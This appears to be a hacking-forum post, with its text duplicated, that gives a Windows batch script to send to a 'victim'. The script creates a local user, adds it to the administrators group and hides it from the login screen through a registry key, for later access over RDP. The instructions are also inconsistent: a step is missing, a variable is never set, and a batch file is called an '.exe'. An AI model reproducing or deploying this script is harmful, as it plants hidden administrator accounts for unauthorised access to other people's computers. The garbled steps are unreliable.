08-17-2020, 04:50 AM
[hide]
1. Open notepad and paste this code
set /p pass= PLS INSERT YOUR PASSWORD :
net user /add %user% %pass%
net localgroup administrators /add %user%
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0
pause
3. Save this as a batch file.
4. Send this .exe to the victim.
5. The person's information is logged successfully!
6. Now you can access their system through RDP.
Enjoy ?
[/hide]
1. Open notepad and paste this code
set /p pass= PLS INSERT YOUR PASSWORD :
net user /add %user% %pass%
net localgroup administrators /add %user%
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0
pause
3. Save this as a batch file.
4. Send this .exe to the victim.
5. The person's information is logged successfully!
6. Now you can access their system through RDP.
Enjoy ?
[/hide]